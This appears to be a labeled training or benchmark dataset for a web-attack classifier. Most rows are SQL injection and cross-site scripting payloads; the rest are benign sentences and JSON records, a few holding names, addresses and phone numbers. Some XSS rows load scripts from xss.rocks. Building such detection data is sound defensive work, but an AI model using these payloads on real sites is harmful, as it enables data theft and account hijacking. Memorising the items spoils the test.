'subq",2,SQLi,14796 "-1485' ) ) ) union all select 7661,7661,7661,7661,7661--",2,SQLi,17630 "<style>@keyframes x{}</style><th style=""animation-name:x"" onanimationend=""alert(1)""></th>",1,XSS,1779 1 ) where 7026 = 7026,2,SQLi,21591 "1' ) ) as kpdl where 4443 = 4443 union all select null,null,null,null,null,null--",2,SQLi,15135 "1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'qdsr' like 'qdsr",2,SQLi,11157 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--",2,SQLi,13096 1' and non_existant_table = '1,2,SQLi,20516 Let's find out where the art exhibition is.,3,normal,23716 "1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) -- pvdw",2,SQLi,13887 "1 ) where 5096 = 5096 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14514 Select your complete.,3,normal,25009 "-8881%' union all select 8420,8420,8420,8420,8420,8420,8420#",2,SQLi,17156 <img src=validimage.png onloadend=alert(1)>,1,XSS,7274 "1%' ) ) union all select null,null,null,null,null,null--",2,SQLi,17667 select case when 8227 = 1229 then 1 else null end--,2,SQLi,18296 "-5998"" ) as gazd where 2814 = 2814 union all select 2814,2814,2814,2814,2814,2814,2814--",2,SQLi,14803 "1"" where 2619 = 2619 and 2823 = 5100#",2,SQLi,19869 ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,17119 "1"" ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""vnso"" like ""vnso",2,SQLi,12494 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11",2,SQLi,16643 1'+ ( select ohqr where 5610 = 5610,2,SQLi,20029 Tap to select each app that you want to hide. 5.,3,normal,25505 "1 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) # miji",2,SQLi,13684 1' in boolean mode ) and 5725 = 5552#,2,SQLi,19853 "<script draggable=""true"" ondragstart=""alert(1)"">test</script>",1,XSS,3295 "<style>@keyframes slidein {}</style><frame style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></frame>",1,XSS,380 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 4 ) ) AND 'i' = 'i",2,SQLi,11508 "1"" ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ""vhey"" = ""vhey",2,SQLi,14271 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i",2,SQLi,11906 "<form onbeforepaste=""alert(1)"" contenteditable>test</form>",1,XSS,3847 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,15075 waitfor delay '0:0:5'#,2,SQLi,21536 "1 ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,13801 "{""id"":null,""firstName"":""Sujith"",""lastName"":""Wijerathne"",""address"":""97 WEST OAK AVE, PANAMA CITY FL 32401"",""city"":""558"",""telephone"":""4262265751""}",3,normal,26980 "1%' ) ) and elt ( 4249 = 4249,7259 ) and ( ( '%' = '",2,SQLi,18202 Select the best camera settings for the shot.,3,normal,24108 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#",2,SQLi,13063 <dialog id=x tabindex=1 onactivate=alert(1)></dialog>,1,XSS,5026 "1"" or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,14053 "1' ) as cgsz where 7194 = 7194 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12294 "<style>@keyframes x{}</style><samp style=""animation-name:x"" onanimationend=""alert(1)""></samp>",1,XSS,1660 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></embed>",1,XSS,214 Delete the spam emails.,3,normal,22563 "{""id"":null,""name"":""winter""}",3,normal,26847 "))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337",2,SQLi,15922 <body onhelp=alert(1)>press F1! (MSIE),1,XSS,8529 "1"" ) ) ) and 4124 = 7245 and ( ( ( ""tuom"" = ""tuom",2,SQLi,18574 select ( case when ( 8113 = 8981 ) then 8113 else 1/ ( select 0 ) end ) --,2,SQLi,15786 "1' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,13925 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 9646 = 9646",2,SQLi,14219 "<img src=1 onerror=""s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);""",1,XSS,794 "1' ) ) and make_set ( 3793 = 8118,8118 ) and ( ( 'swvc' like 'swvc",2,SQLi,16641 1' ) as gxfu where 9676 = 9676,2,SQLi,20655 "Select ""Wallet"" and press X, then select ""Add Funds"" and press X.",3,normal,25670 "-9541 ) as bnky where 3934 = 3934 union all select 3934,3934,3934#",2,SQLi,16617 <hr onpointerup=alert(1)>XSS</hr>,1,XSS,9333 "{""id"":null,""name"":""shoulder paint empty""}",3,normal,27505 "{""id"":null,""name"":""Scyther""}",3,normal,26839 <noembed id=x tabindex=1 onactivate=alert(1)></noembed>,1,XSS,4500 ><img src=x onerror=prompt(1);>,1,XSS,9508 "<a href=""javas\x09cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2415 He'll select the wine.,3,normal,24469 "<style>:target {color: red;}</style><dialog id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dialog>",1,XSS,836 <dd onpointerdown=alert(1)>XSS</dd>,1,XSS,9066 "<br onclick=""alert(1)"">test</br>",1,XSS,9458 document.write,1,XSS,9813 "1%"" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""%"" = """,2,SQLi,12561 "1"" ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13313 "1%"" and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13187 "<style>:target {color:red;}</style><main id=x style=""transition:color 1s"" ontransitionend=alert(1)></main>",1,XSS,1222 "1 ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 5888 = 5888",2,SQLi,12979 -4610' ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'hdco' = 'hdco,2,SQLi,9981 1'|| ( select 'vwls' where 5252 = 5252 rlike sleep ( 5 ) #,2,SQLi,17438 "1' ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11399 Men's tennis is no longer ruled by a select few.,3,normal,25884 0x770061006900740066006F0072002000640065006C00 ...,2,SQLi,18409 "<li onkeydown=""alert(1)"" contenteditable>test</li>",1,XSS,5611 "1'|| ( select 'sned' where 4957 = 4957 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,11931 "<body draggable=""true"" ondragend=""alert(1)"">test</body>",1,XSS,4583 I'm considering where to go for a creative class.,3,normal,23790 "1'|| ( select 'wqmz' where 6400 = 6400 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) ) ||'",2,SQLi,10316 <SCRIPT>alert('')</SCRIPT>,1,XSS,9680 <td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus>,1,XSS,2525 "-1998' ) as kgvf where 2346 = 2346 union all select 2346,2346,2346,2346,2346,2346,2346,2346,2346--",2,SQLi,14206 select the dog,3,normal,25691 "<option onmouseup=""alert(1)"">test</option>",1,XSS,7463 "<blockquote oncontextmenu=""alert(1)"">test</blockquote>",1,XSS,4784 "<menu onbeforecut=""alert(1)"" contenteditable>test</menu>",1,XSS,4383 1 ) and ( 7557 = 1711 ) *1711 and ( 5157 = 5157,2,SQLi,18897 "1"" ) ) as azak where 4911 = 4911",2,SQLi,20293 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ||'",2,SQLi,14459 "<body onmouseenter=""alert(1)"">test</body>",1,XSS,7645 <fieldset onpointerout=alert(1)>XSS</fieldset>,1,XSS,6454 "1"" ) as rdvm where 6360 = 6360 and sleep ( 5 ) --",2,SQLi,18573 "<br onmousedown=""alert(1)"">test</br>",1,XSS,8812 "{""id"":null,""firstName"":""Šâñ"",""lastName"":""Dãr"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27359 -2483' where 1327 = 1327 union all select 1327#,2,SQLi,18880 Select encourage.,3,normal,24738 "1"" ) as fgne where 7207 = 7207",2,SQLi,20660 "1%"" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ""%"" = """,2,SQLi,10642 "-3179'+ ( select 'tzzz' where 3191 = 3191 union all select 3191,3191,3191,3191,3191#",2,SQLi,14964 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,12986 <frame onpointerover=alert(1)>XSS</frame>,1,XSS,7640 "1%' ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16057 "1"" ) as saqy where 9704 = 9704 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,10220 "<s oncut=""alert(1)"" contenteditable>test</s>",1,XSS,6857 -5268' ) where 5615 = 5615 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10643 "1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'fjfo' = 'fjfo",2,SQLi,11263 "<style>@keyframes x{}</style><command style=""animation-name:x"" onanimationstart=""alert(1)""></command>",1,XSS,1388 Select a painting style to experiment with.,3,normal,24241 "<style>:target {transform: rotate(180deg);}</style><noembed id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></noembed>",1,XSS,557 "-3775' ) as rqet where 7092 = 7092 or elt ( 1032 = 1032,3623 ) --",2,SQLi,16728 <noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes>,1,XSS,3097 "<details draggable=""true"" ondragend=""alert(1)"">test</details>",1,XSS,3287 -7746' ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 'itxy' like 'itxy,2,SQLi,9954 <iframe/src \/\/onload = prompt(1),1,XSS,9169 "1 ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 1915 = 1915",2,SQLi,17478 "<ruby onmousemove=""alert(1)"">test</ruby>",1,XSS,7850 &lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;,1,XSS,1315 "1 ) as rbmn where 5948 = 5948 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11119 "<address onclick=""alert(1)"">test</address>",1,XSS,7453 I'm considering where to go for a leisurely walk.,3,normal,23831 1'+ ( select 'zjvx' where 4683 = 4683 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ) +',2,SQLi,14730 "1' in boolean mode ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11269 "<div id=""97""><!-- IE 5-9 -->",1,XSS,9634 <svg><animate onend=alert(1) attributeName=x dur=1s>,1,XSS,5074 "select sleep ( 5 ) and ""cyrb"" = ""cyrb",2,SQLi,19808 "<abbr draggable=""true"" ondrag=""alert(1)"">test</abbr>",1,XSS,5277 1'|| ( select 'goen' from dual where 8586 = 8586,2,SQLi,18677 Filter results.,3,normal,23053 1) WAITFOR DELAY '0:0:5' AND (1337=1337,2,SQLi,19574 ORDER BY 13,2,SQLi,22371 He'll modify the recipe.,3,normal,23001 Select your group.,3,normal,24869 <textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>,1,XSS,1859 1'+ ( select emeu where 2310 = 2310,2,SQLi,20095 "{""id"":null,""name"":""Coredramon (Blue)""}",3,normal,26930 "1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'cbwx' = 'cbwx",2,SQLi,10330 "<figcaption onkeydown=""alert(1)"" contenteditable>test</figcaption>",1,XSS,2767 "<style>@keyframes x{}</style><strong style=""animation-name:x"" onanimationend=""alert(1)""></strong>",1,XSS,1543 <figure onpointerdown=alert(1)>XSS</figure>,1,XSS,7265 <del onpointerleave=alert(1)>XSS</del>,1,XSS,8437 Select a book to read before bed.,3,normal,24017 ) or sleep(5)=',2,SQLi,22160 <audio src onloadstart=alert(1)>,1,XSS,9478 Select the font.,3,normal,22871 -7971' union all select 4273#,2,SQLi,20703 <;IMG SRC=javascript:alert(';XSS';)>;,1,XSS,8566 <shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow>,1,XSS,3773 "1%"" ) ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13484 "1 ) as asmt where 4986 = 4986 union all select null,null#",2,SQLi,17517 <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/,1,XSS,4657 Select goods.,3,normal,24559 "1%' ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( '%' = '",2,SQLi,11458 "That's why we have elections, why we democratically select leaders.",3,normal,25492 <base onpointermove=alert(1)>XSS</base>,1,XSS,8269 "1%"" and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13413 ><script src=data:&comma;alert(1)//,1,XSS,9129 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 3127 = 3127",2,SQLi,12122 "1"" ) where 6671 = 6671 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11747 "or 1""=""1""/*",2,SQLi,22342 <li onpointerover=alert(1)>XSS</li>,1,XSS,9099 "<style>@keyframes x{}</style><dfn style=""animation-name:x"" onanimationend=""alert(1)""></dfn>",1,XSS,1739 Filter search results.,3,normal,22801 "<style>:target {transform: rotate(180deg);}</style><bgsound id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></bgsound>",1,XSS,563 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#",2,SQLi,15381 "<command draggable=""true"" ondragend=""alert(1)"">test</command>",1,XSS,3347 "1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'vgro' like 'vgro",2,SQLi,11516 <b onpointermove=alert(1)>XSS</b>,1,XSS,9357 <svg><s onload=alert(1)></s>,1,XSS,9631 """></title><script>alert(1111)</script>",1,XSS,8317 "UNION ALL SELECT 1,2,3,4,5,6,7#",2,SQLi,20388 onmouseover=alert(/XSS/),1,XSS,9722 Read on to find out how to select a futon and the proper mattress to go with it.,3,normal,25760 Save up to 35% off select McCafe K-Cups and Coffee,3,normal,25719 "<HTML xmlns:xss><?import namespace=""xss"" implementation=""%(htc)s""><xss:xss>XSS</xss:xss></HTML>"""""",""XML namespace.""),(""""""<XML ID=""xss""><I><B>&lt;IMG SRC=""javas<!-- -->cript:javascript:alert(1)""&gt;</B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>",1,XSS,60 "1' ) where 9842 = 9842 union all select null,null,null,null,null,null,null,null#",2,SQLi,15177 "<bgsound onbeforecut=""alert(1)"" contenteditable>test</bgsound>",1,XSS,3203 1) or pg_sleep(5)--,2,SQLi,21917 "1"" ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,18057 <spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus>,1,XSS,2512 <x onxxx%3D1,1,XSS,9831 "union ( select NULL, NULL, NULL, ( select @@version ) ) --",2,SQLi,17346 "{""id"":null,""name"":""Binacle""}",3,normal,26944 1' ) ) as jtmf where 3937 = 3937,2,SQLi,20346 select pg_sleep ( 5 ) ) ||',2,SQLi,20893 "1' where 7504 = 7504 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11783 "-5644"" ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( ""evcf"" = ""evcf",2,SQLi,16162 -2648' ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'sawt' = 'sawt,2,SQLi,10198 select ( case when ( 8403 = 7151 ) then 8403 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13570 or 'text' > 't',2,SQLi,22156 "<blockquote onclick=""alert(1)"">test</blockquote>",1,XSS,5995 "1"" where 7110 = 7110",2,SQLi,21825 I can still remember the glee with which we demolished some of the silly recommendations of one particular Select Committee.,3,normal,26077 "{""id"":null,""firstName"":""Eddie"",""lastName"":""Khoo"",""address"":""45 E Liberty St"",""city"":""974"",""telephone"":""163085771""}",3,normal,27520 <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>,1,XSS,2074 "1"" ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12146 "{""id"":null,""firstName"":""Ann"",""lastName"":""Ang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26792 <head id=x tabindex=1 onactivate=alert(1)></head>,1,XSS,5824 "Now, we may select any definite quantity of work we please as our unit, as, for example, the work done in lifting a pound a foot high from the sea-level in the latitude of London, which is the unit of work generally adopted by British engineers, and is called the ""foot-pound.""",3,normal,25860 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ""%"" = """,2,SQLi,13359 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--",2,SQLi,16903 <img onblur=alert(1) tabindex=1 id=x></img><input autofocus>,1,XSS,3515 Filter the spam calls.,3,normal,22708 I'm considering where to have dinner tonight.,3,normal,23891 "-5158' ) ) or make_set ( 9354 = 9354,7185 ) and ( ( 'noaj' like 'noaj",2,SQLi,16293 1' ) ) as xirr where 2425 = 2425,2,SQLi,20326 "select * from users where id = 1. <@ union select 1,version ( ) -- 1",2,SQLi,16367 "-3638"" union all select 4394,4394,4394,4394,4394,4394,4394--",2,SQLi,17174 "<img/id=""alert('XSS')\""/alt=\""/\""src=\""/\""onerror=eval(id)>",1,XSS,3784 Modify data where needed.,3,normal,23256 <b onpointerover=alert(1)>XSS</b>,1,XSS,9339 "1%' and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19422 "{""id"":null,""name"":""needed stretch""}",3,normal,27224 1' in boolean mode ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) #,2,SQLi,10726 "ABC<div style=""x:\xE2\x80\x86expression(javascript:alert(1)"">DEF",1,XSS,2862 "<style>:target {color:red;}</style><code id=x style=""transition:color 1s"" ontransitionend=alert(1)></code>",1,XSS,1223 "iif ( 7889 = 5114,1,1/0 )",2,SQLi,21046 "<iframe xmlns=""#"" src=""javascript:alert(1)""></iframe>",1,XSS,4866 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( ""mubt"" = ""mubt",2,SQLi,13304 She picked up a map from the tourist center.,3,normal,23685 "<SCRIPT/SRC=""http://xss.rocks/xss.js""></SCRIPT>",1,XSS,6087 AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i,2,SQLi,12570 1' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( 'ugrk' = 'ugrk,2,SQLi,15293 "<svg onkeypress=""alert(1)"" contenteditable>test</svg>",1,XSS,4926 "<img draggable=""true"" ondragenter=""alert(1)"">test</img>",1,XSS,4534 "<style>@keyframes x{}</style><map style=""animation-name:x"" onanimationstart=""alert(1)""></map>",1,XSS,1674 "Mark Warner, vice chairman of the Senate Select Committee on Intelligence.",3,normal,25896 Save up to 60 percent off on select items at bloomingdales.com.,3,normal,25711 "<abbr draggable=""true"" ondragstart=""alert(1)"">test</abbr>",1,XSS,4057 level,3,normal,23233 Select glass.,3,normal,24525 1' where 8537 = 8537 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,10024 "iif ( 5519 = 4796,1,1/0 )",2,SQLi,21159 "1'+ ( select 'qpxk' where 7139 = 7139 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) ) +'",2,SQLi,11977 ORDER BY 29--,2,SQLi,22252 -8099%' ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( '%' = ',2,SQLi,10261 1' and 2006 = 2006,2,SQLi,22072 "1 ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 9313 = 9313",2,SQLi,10279 "1%' ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13329 "<SCRIPT SRC=""%(jpg)s""></SCRIPT>",1,XSS,9490 1' ) as mzby where 6530 = 6530,2,SQLi,20653 "1%"" ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""%"" = """,2,SQLi,12903 "You'll need to register (or re-register) using this link and select ""iOS"" as your phone make or model for Microsoft to select you as an iOS tester.",3,normal,25059 "<wbr onbeforepaste=""alert(1)"" contenteditable>test</wbr>",1,XSS,4319 -5062 ) where 7457 = 7457 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,10004 %uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e',1,XSS,5521 "<style>:target {color:red;}</style><frameset id=x style=""transition:color 1s"" ontransitionend=alert(1)></frameset>",1,XSS,860 select pg_sleep ( 5 ) ) +',2,SQLi,21016 "<img oncut=""alert(1)"" contenteditable>test</img>",1,XSS,5974 <body onblur=alert(1) id=x><iframe id=x>,1,XSS,7878 "<style>:target {transform: rotate(180deg);}</style><figure id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></figure>",1,XSS,597 "<dt onmousedown=""alert(1)"">test</dt>",1,XSS,8807 "<object data=""javascript:alert()"">",1,XSS,9189 "1"" ) where 8878 = 8878 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10994 onmouseover=alert(1)//,1,XSS,9749 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#",2,SQLi,14376 Select hatch.,3,normal,24754 <datalist id=x tabindex=1 ondeactivate=alert(1)></datalist><input id=y autofocus>,1,XSS,1953 "<a onmouseenter=""alert(1)"">test</a>",1,XSS,9123 "1"" where 7015 = 7015",2,SQLi,21827 -9054 ) ) ) or 9323 = 9323#,2,SQLi,20932 ORDER BY 30#,2,SQLi,22324 <svg><section onload=alert(1)></section>,1,XSS,7913 "1'+ ( select iaeu where 5509 = 5509 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,14805 &lt;IMG SRC=&quot;mocha:[code]&quot;&gt;,1,XSS,7833 <dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus>,1,XSS,2515 "<keygen onmouseenter=""alert(1)"">test</keygen>",1,XSS,6735 